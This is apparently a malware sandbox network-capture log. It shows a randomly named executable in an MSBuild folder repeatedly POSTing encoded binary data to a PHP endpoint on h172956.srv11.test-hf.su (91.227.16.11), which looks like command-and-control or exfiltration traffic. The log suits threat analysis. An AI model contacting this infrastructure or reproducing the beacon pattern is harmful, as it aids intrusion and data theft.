                                                                                      Mar 6, 2024 09:52:55.444401026 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:55.784737110 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:55.785018921 CET | 2548 | OUT | Data Raw: 51 5d 51 5c 5e 59 50 57 5e 57 5a 51 57 5d 50 58 54 54 54 5b 56 5f 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q]Q\^YPW^WZQW]PXTTT[V_W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B82935Z$8<6]3;0%_ Q5<"?,022/%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:56.151941061 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      21 | 192.168.2.4 | 49762 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:56.622031927 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:56.967185974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:56.967591047 CET | 2548 | OUT | Data Raw: 54 5f 54 5c 5e 5a 50 56 5e 57 5a 51 57 5a 50 52 54 50 54 5a 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_T\^ZPV^WZQWZPRTPTZV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/19%#!^$5:\;<!38Y1$P"7"?_'42>X,%Z"!Q*%
                                                                                      Mar 6, 2024 09:52:57.339699030 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:57 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      22 | 192.168.2.4 | 49764 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:57.964379072 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:58.305372953 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:58.305697918 CET | 1872 | OUT | Data Raw: 51 5b 54 58 5e 59 55 51 5e 57 5a 51 57 5b 50 5c 54 56 54 58 56 5d 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TX^YUQ^WZQW[P\TVTXV]WTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9,!*T'0"&&:Y;53;/X&<U#< !_$'#\12Y-)%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:58.675340891 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 59 26 2b 0e 0e 23 23 0e 50 2b 2e 2e 1c 3e 0f 26 13 3f 06 3d 5f 28 2f 26 16 3b 29 01 09 3f 01 2c 19 22 3f 0e 57 36 31 33 0b 26 29 20 5c 05 11 24 01 27 22 0f 58 27 03 29 5c 24 08 35 5f 26 06 2f 42 2a 2b 22 5b 26 39 3b 5c 20 23 24 57 25 29 2b 5a 24 3f 3a 01 39 3e 24 06 31 3d 2d 54 02 17 22 56 30 2e 24 5a 28 20 1a 05 26 32 3d 15 28 2d 20 53 22 5f 23 0d 36 30 39 5b 31 3b 25 04 22 0c 34 04 3f 3b 38 05 30 2f 3c 56 25 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.Y&+##P+..>&?=_(/&;)?,"?W613&) \$'"X')\$5_&/B*+"[&9;\ #$W%)+Z$?:9>$1=-T"V0.$Z( &2=(- S"_#609[1;%"4?;80/<V%>#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      23 | 192.168.2.4 | 49765 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:58.092155933 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:58.437748909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:58.438003063 CET | 2548 | OUT | Data Raw: 51 59 54 50 5e 5d 55 50 5e 57 5a 51 57 5a 50 5b 54 55 54 52 56 54 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYTP^]UP^WZQWZP[TUTRVTW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;3)$56-,!'#Z&_?"/<"Y$42?&Z-9%Z"!Q*%
                                                                                      Mar 6, 2024 09:52:58.810152054 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:58 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      24 | 192.168.2.4 | 49766 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:59.295599937 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:59.639029980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:59.639363050 CET | 2548 | OUT | Data Raw: 51 59 54 5f 5b 5f 55 54 5e 57 5a 51 57 5b 50 5d 54 53 54 5a 56 5a 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYT_[_UT^WZQW[P]TSTZVZW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B,"53U&$&6-?13019,!!,(37Y%,Y89%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:00.012213945 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:59 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      25 | 192.168.2.4 | 49767 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:00.484271049 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:00.827367067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:00.827631950 CET | 2548 | OUT | Data Raw: 54 58 54 50 5e 59 55 50 5e 57 5a 51 57 58 50 5e 54 53 54 59 56 5c 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TXTP^YUP^WZQWXP^TSTYV\W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;233&'*\;'; 2,"$5/X37#%<8)%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:01.202150106 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:01 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      26 | 192.168.2.4 | 49768 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:01.671350002 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:02.019824982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:02.020070076 CET | 2548 | OUT | Data Raw: 54 5f 54 51 5e 5d 50 53 5e 57 5a 51 57 5d 50 59 54 51 54 58 56 59 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T_TQ^]PS^WZQW]PYTQTXVYWZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;1360&853(%9Q557X&$'&.\,%Z"!Q*9
                                                                                      Mar 6, 2024 09:53:02.420016050 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:02 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      27 | 192.168.2.4 | 49769 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:02.884018898 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:03.228266954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:03.228669882 CET | 2548 | OUT | Data Raw: 51 5c 54 5d 5e 5a 50 51 5e 57 5a 51 57 5b 50 59 54 50 54 5b 56 54 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T]^ZPQ^WZQW[PYTPT[VTWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D816W$ *'P*/<"^&+;[&<W6?4#<34&]/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:03.764750957 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:03 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49770 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:04.029393911 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:04.372209072 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:04.372600079 CET | 1872 | OUT |
Mar 6, 2024 09:53:04.743156910 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49771 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:04.153362989 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:04.496433020 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:04.496937037 CET | 2548 | OUT |
Mar 6, 2024 09:53:04.869287014 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:04 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49772 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:05.340676069 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
Mar 6, 2024 09:53:05.685585976 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:05.685894012 CET | 2548 | OUT |
Mar 6, 2024 09:53:06.061042070 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49773 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:06.530637026 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:06.871992111 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:06.872237921 CET | 2544 | OUT |
Mar 6, 2024 09:53:07.242892981 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49774 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:07.718955994 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:08.067553043 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:08.067934036 CET | 2548 | OUT |
Mar 6, 2024 09:53:08.444546938 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:08 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49775 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:53:08.932025909 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
Mar 6, 2024 09:53:09.277007103 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:53:09.277337074 CET | 2548 | OUT |
Mar 6, 2024 09:53:09.652546883 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
